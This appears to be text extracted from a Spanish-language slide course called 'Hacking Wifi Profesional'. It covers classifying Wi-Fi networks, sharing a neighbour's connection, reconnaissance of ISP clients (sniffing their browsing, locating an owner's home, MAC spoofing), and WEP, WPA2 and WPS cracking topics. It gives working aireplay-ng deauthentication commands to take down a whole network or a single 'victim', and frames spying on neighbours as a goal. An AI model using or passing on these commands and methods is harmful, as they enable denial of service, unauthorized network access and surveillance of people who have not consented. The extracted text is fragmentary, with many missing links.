HACKING WIFI
PROFESIONAL
�NIVEL 0
HARDWARE
� Adaptadores Wifi
Cómpralo en:
Kasens G900
� Adaptadores Wifi
Wifisky
¿watts? ¡el mas potente!
Cómpralo en:
� Adaptadores Wifi
Cómpralo en:
Melón
�Conexión Exitosa
-1
Alfa 1 watts
-59
Redes de Casa
[Link]
�Conexión Exitosa
-1
Alfa 1 watts
-55
Redes WISP
-50
-45
[Link]
�Conexión Exitosa
TP-Link 7200ND
-1
-83
Redes de Casa
[Link]
�Conexión Exitosa
TP-Link 7200ND
-1
-75
Redes WISP
-68
-59
[Link]
�[Link]
� Opcional
[Link]
[Link]
�[Link]
[Link]
�[Link]
�NIVEL 1
Wifi Identify
[Link]
�IDENTIFICAR REDES
DE CASA
[Link]
�1
ESSID
Essid de Casa es el resultado de usar un nombre
que no tenga referencia a Empresas
[Link]
�2
MAC ADDRESS
TP-LINK (2007) NUCOM (2014-a) THOMSON
ZTE (2008) (2013) ARRIS (2014-a) MISTRASTAR (2015-a)
ZYXEL (2009) ASKEY (2015-a) 2 WIRE (2011)
HUAWEI (2008) COMTREND SPEEDTOUCH (2007)
[Link]
�3
CHANNEL
Canales de casa son: 1, 6, 11.
[Link]
�4
POWER
1. Conexión exitosa con señal baja.
2. Cantidad de usuarios.
[Link]
�5
MAX RATE
1. Ancho de banda del Router. (> 54)
2. Calcula el tiempo de vida.
3. Identificamos Low, normal, fast.
[Link]
�[Link]
�IDENTIFICAR REDES
DE REPARTIDORES
[Link]
�1
ESSID
Essid de WISP es el resultado de usar un nombre
que tenga referencia a Empresas + Numero Telefónico
[Link]
�2
MAC ADDRESS
UBIQUITI ZCOM
SENAO COMPEX
EDIMAX
PROWARE TP-LINK
[Link]
�3
CHANNEL
Canales de repartidores son:
2, 3, 4, 5, 7, 8, 9, 10, 12, 13
[Link]
�4
POWER
1. Conexión exitosa con señal Alta.
2. Muchos clientes (usuarios).
[Link]
�5
MAX RATE
1. Ancho de banda del Router. (11,54)
2. Calcula el tiempo de vida.
3. Identificamos Low, normal, fast.
[Link]
�[Link]
�IDENTIFICAR REDES
DE EMPRESAS
[Link]
�1
ESSID
Son Essid que tenga referencia a Empresas
y que no tenga numero de teléfono
[Link]
�2
MAC ADDRESS
Destacados
NETGEAR AZTECH
ASUS BUFFALO
LINKSYS
CISCO
D-LINK
[Link]
�3
CHANNEL
Canales de empresas son:
todos los canales
[Link]
�4
POWER
1. Conexión exitosa con señal Alta.
2. Muchos clientes (usuarios).
[Link]
�5
MAX RATE
1. Ancho de banda del Router. (> 54)
2. Calcula el tiempo de vida.
3. Identificamos Low, normal, fast.
[Link]
�[Link]
� linSSID
1. sudo add-apt-repository ppa:wseverin/ppa
2. sudo apt-get update
3. sudo apt-get install linssid
[Link]
�Debugging
[Link]
�COMPARTIR INTERNET
EN TODA TU CASA
PARTIENDO DE UNA RED VECINA
[Link]
� REQUERIMIENTOS
1. Tener acceso vía WIFI a esa RED
2. Contar con un AP TP-LINK WA701ND
[Link]
� TP-LINK WA701ND
[Link]
� Antena Indoor
Alcance
Antena Propia
TP-LINK WA701ND
20 Metros
¿Solo la TP-LINK?
Antena Propia
ADAPTADOR WIFI
30 Metros
[Link]
� Zona urbana
Alcance
Antena Panel
TP-LINK WA701ND
500 metros
Antena Panel
ADAPTADOR WIFI
700 metros
[Link]
�[Link]
�[Link]
�[Link]
�COMPARTIR INTERNET
EN TODA TU CASA
PARTIENDO DE UNA RED VECINA
[Link]
� Requisitos
REQUERIMIENTOS
1. Tener Laptop (por su wifi interno)
¿Serian 2 receptores WIFI?
[Link]
� Lógica
¿Cómo comparte?
internet
Laptop WIFI recibe
internet
Laptop WIFI reparte
[Link]
� Compartir
Comandos
1. netsh wlan set hostednetwork mode=allow ssid=hp1551 key=12345678
2. netsh wlan start hostednetwork
[Link]
� NIVEL 3
INGENIERIA INVERSA WIFI
[Link]
� OBSERVACIÓN
En el nivel 01 (curso 03) -> Curso 04
[Link]
� REBUILD WISP
Reconstruyendo la información.
Información
[Link]
� LÓGICA
Black information Information Gray Information White
Reconstructed
[Link]
�1 Pentesting Externo
CLIENTE WISP
01. Clase C: [Link]/24 95% | Clase A: [Link]/24 5%
02. Marcas mas usadas. TP-LINK 95% y UBIQUITI 5%
03. Solo puedes hacer spoofing a Mac Inalámbricas
[Link]
�1 Pentesting Externo
CLIENTES TP-LINK
Mac Antiguas
0023CD
002586
002719
2009 001D0F
al
2012 002127
F4EC38
D85D4C
940C6D
[Link]
�4 Pentesting Externo
CLIENTE WISP
¿Cual es la MAC de los clientes? ¿Qué paginas ingresan los clientes?
¡Mac Address! ¡Sniffing!
IP & Segmentos usados por los clientes Tips de Seguridad Informática
¡IPs & Segmentos! ¡Security!
[Link]
[Link]
�4 Pentesting Externo
¿Qué modem usan?
¿Qué marca les puso su ISP?
¡fingerprinting!
¿Cuál es su dirección IP?
¿Cómo rastrear la casa del dueño?
¡Localización Exacta!
¿Cuál es su proveedor ISP?
¡ISP!
Defacement SSID ¿Cómo securizamos estos fallos?
¡Defacing! ¡Security!
[Link]
[Link]
�4 Pentesting Externo
EMISORES WISP
¿IPs de los Servidores WISP?
Con que Equipos reparten internet
¡Fingerprinting!
¡marca del kit emisor!
Torre WISP
Reconstruyendo topología de Red
IPs y segmentos usados por los emisores ¡Infraestructura WISP!
¡IPs & Segmentos!
Dueño
Defacement SSID WISP Tips de Seguridad WISP
¡Defacing! ¡Seguridad!
[Link]
[Link]
�5 Clientes WISP Segmento de los Emisores (192.168.1.x)
PROWARE UBIQUITI NANOSTATION M5
Pentesting Externo
1 3
[Link] 3 [Link]
[Link] (TP-LINK) [Link] [Link] [Link] (TP-LINK)
Facebook Yahoo
USER Google Hotmail MYPC
Facebook
[Link] [Link]
2 4
[Link] (TP-LINK) Torre WISP [Link] (PROWARE)
Terra Facebook
Google Perú
ANAIS-PC Facebook Youtube MYPC
[Link]
[Link] [Link]
Segmento del dueño (192.168.5.x) Galaxy Young GT-S6310L Segmento de los clientes (192.168.3.x)
[Link]
1
[Link] 2
ISP MOVISTAR
DNS: [Link] RB750 Mikrotik Mikrotik OS 4.17 MFBP-JCXL
DNS: [Link]
Gateway
Router
ZYXEL (Controla el Bandwidth)
LG SMART TV 32LN570B-SH
(Arcadyan)
Hotspot (Portal Cautivo)
Dueño
[Link] WISP 5 puertos 10/100 WAN o LAN
[Link] [Link] [Link]
[Link]
Firewall + Proxy
[Link]
LINUX 3.0.13
[Link]
�3 Reconociendo implementaciones WISP
[Link]
�2 Pentesting Externo
SERVIDORES WISP
01. Usabilidad: MIKROTIK 99% y PFSENSE 1%
02. Fingerprinting a los Servidores (S.O + Versión + IP + Gateway)
03. Reconociendo infraestructura de un WISP ¡Pentest Externo!
[Link]
�3
SEGURIDAD WISP
01. Los WISP no usan contraseña y eso es negligencia.
02. Los WISP usan Seguridad WEP
03. Usar Seguridad WPA2/AES + 12 dígitos (incluya !”#$%&)
04. Desactivar WPS
05. Cambiar la contraseña del modem + contraseña wifi
06. Existe una herramienta llamada FLUXION MODIFICADO 2017
[Link]
�3
SEGURIDAD WISP
Apágalo y préndelo
¡test! Efecto Boomerang
¡DoS!
Fluxion Modificado 2017
Vive a tu lado
¡vecino!
Déjalo entrar
¡espíalo!
Sigue a la Mac
¡encuéntralo!
[Link]
�3
APAGO Y PRENDO
Si lo apago y lo prendo = no hay internet (problema isp)
Si lo apago y lo prendo = si hay internet rápido (tu vecino lammer)
[Link]
�NIVEL 4
DDoS WIFI
[Link]
�Denial Off Service
Windows
[Link]
�[Link]
Windows
� WINDOWS
aireplay-ng -0 0 -a Mac Empresa -x 150 [Link]:1 (tumbar toda la red)
Opcional
aireplay-ng -0 0 -a Mac Empresa -c Mac Victima -x 150 [Link]:1
(solo a la victima)
[Link]
�Kali Linux
[Link]
�1
No es captura de paquetes, es captura de tráfico
[Link]
�1
No es captura de paquetes, es captura de tráfico
[Link]
�1
Comando 04
� Comando 05
Kali Linux
aireplay-ng -0 0 -a Mac Empresa -x 150 wlan0mon (tumbar toda la red)
Opcional
aireplay-ng -0 0 -a Mac Empresa -c Mac Victima -x 150 wlan0mon
(solo a la victima)
[Link]
� NIVEL 5
Hacking Wep, Wpa, Wpa2
[Link]
�Hacking Opn
Windows
[Link]
�Hacking Opn y Wep
Windows
[Link]
�[Link]
Windows
�Hacking Opn, Wep y Wpa2
Kali Linux
[Link]
�1
No es captura de paquetes, es captura de tráfico
[Link]
�1
No es captura de paquetes, es captura de tráfico
[Link]
�1
Comando 04
�1
Versión de 64bits
[Link]
32 bits VMware (clásica) ¡Ambas son buenas!
[Link]
� NIVEL 6
Fluxion Modificado WPA2
[Link]
�1
Fluxion Modificado y funciona a la perfección (Es otro)
[Link]
� NIVEL 6
Hacking Router & Modem
[Link]
�[Link]
¡Aunque ya esta instalado en Kali Linux!
�[Link]
¡Aunque ya esta instalado en Kali Linux!
� NIVEL 7
Hacking Wps y nuevas tools
[Link]
